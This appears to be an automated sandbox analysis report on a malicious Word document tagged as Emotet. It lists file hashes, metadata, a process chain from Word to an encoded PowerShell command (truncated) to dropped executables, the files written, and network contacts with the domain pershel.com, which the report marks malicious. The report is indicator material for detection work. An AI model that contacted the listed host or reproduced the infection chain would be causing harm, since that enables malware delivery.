| Field | Value |
|---|---|
| download | WGLmTGEibIfWDYA |
| Full analysis | https://app.any.run/tasks/746a6e81-d557-4790-b71b-9fd77795bac4 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date | September 30, 2020, 14:41:31 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Numquam., Author: Nicolas Carre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 30 14:54:00 2020, Last Saved Time/Date: Wed Sep 30 14:54:00 2020, Number of Pages: 1, Number of Words: 4097, Number of Characters: 23355, Security: 8 |
| MD5 | A1FFE330121CA6D3D0E63895A28266AD |
| SHA1 | C1B5648E55ECBA5F24F8C62F4CFF627CDAC5E0CC |
| SHA256 | AA5F51ED04026AAD5AF58F4D5EF9AB31771B70FB02BD536162E5AE19F6E3531B |
| SSDEEP | 1536:cRD3bNqfNpu39IId5a6XP3Mg8afCqTN2tAgOd:cR1qf69xak3MgxC+N27Od |
| Extension | Identified type |
|---|---|
| .doc | Microsoft Word document (54.2) |
| .doc | Microsoft Word document (old ver.) (32.2) |
| Property | Value |
|---|---|
| Title | Numquam. |
| Subject | - |
| Author | Nicolas Carre |
| Keywords | - |
| Comments | - |
| Template | Normal.dotm |
| LastModifiedBy | - |
| RevisionNumber | 1 |
| Software | Microsoft Office Word |
| TotalEditTime | - |
| CreateDate | 2020:09:30 13:54:00 |
| ModifyDate | 2020:09:30 13:54:00 |
| Pages | 1 |
| Words | 4097 |
| Characters | 23355 |
| Security | Locked for annotations |
| Company | - |
| Lines | 194 |
| Paragraphs | 54 |
| CharCountWithSpaces | 27398 |
| AppVersion | 15 |
| ScaleCrop | No |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| TitleOfParts | - |
| HeadingPairs | |
| CodePage | Unicode UTF-16, little endian |
| LocaleIndicator | 1033 |
| CompObjUserTypeLen | 32 |
| CompObjUserType | Microsoft Word 97-2003 Document |
| PID | CMD | Path | Indicators | Parent process | Process details |
|---|---|---|---|---|---|
| 1336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\WGLmTGEibIfWDYA.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3400 | POwersheLL -ENCOD … | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3760 | "C:\Users\admin\Bsatamh\Ytfw7nh\W9oj2lrw.exe" | C:\Users\admin\Bsatamh\Ytfw7nh\W9oj2lrw.exe | | POwersheLL.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 3220 | "C:\Users\admin\AppData\Local\osbaseln\netplwiz.exe" | C:\Users\admin\AppData\Local\osbaseln\netplwiz.exe | — | W9oj2lrw.exe | User: admin; Integrity Level: MEDIUM; Description: ZipTest MFC Application; Version: 1, 0, 0, 1 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA549.tmp.cvr | — | — | — |
| 3400 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BOW6DJQQ79SDMII7H2QA.temp | — | — | — |
| 3400 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 4028388263805ABA00088A0BA4EEA515 | 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 |
| 1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | F52BEDF97A9B01E99B69B5C83518523E | 68B50A1A9852D6200D98D905CEC4EBA6CEF2CBD5699A9F85ABDEA6FF7E780EAC |
| 1336 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 00B92B16F79EF6DD303E90865E112185 | C418AC081B79908D2C573C29DF720BA6D8D50238760DEAB60DC57824201F6CC0 |
| 3760 | W9oj2lrw.exe | C:\Users\admin\AppData\Local\osbaseln\netplwiz.exe | executable | 9F9EB5304ED124E54FC4FCDACB6C0CC8 | 038D44FBB377D4E08FE011BED23F6266B792E98F614B6E3F66834925E1AA3B86 |
| 1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$LmTGEibIfWDYA.doc | pgc | 70A060AC959880094EE3A5E0AC388EB2 | 50F24E5625CE0203AFADB8A977AAD5D5E861AAAD44FE8F201DE84401E385E68C |
| 3400 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb314.TMP | binary | 4028388263805ABA00088A0BA4EEA515 | 5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 |
| 3400 | POwersheLL.exe | C:\Users\admin\Bsatamh\Ytfw7nh\W9oj2lrw.exe | executable | 9F9EB5304ED124E54FC4FCDACB6C0CC8 | 038D44FBB377D4E08FE011BED23F6266B792E98F614B6E3F66834925E1AA3B86 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3400 | POwersheLL.exe | 104.18.62.212:443 | pershel.com | Cloudflare Inc | US | shared |
| 3400 | POwersheLL.exe | 104.18.62.212:80 | pershel.com | Cloudflare Inc | US | shared |
| Domain | IP | Reputation |
|---|---|---|
| pershel.com | | malicious |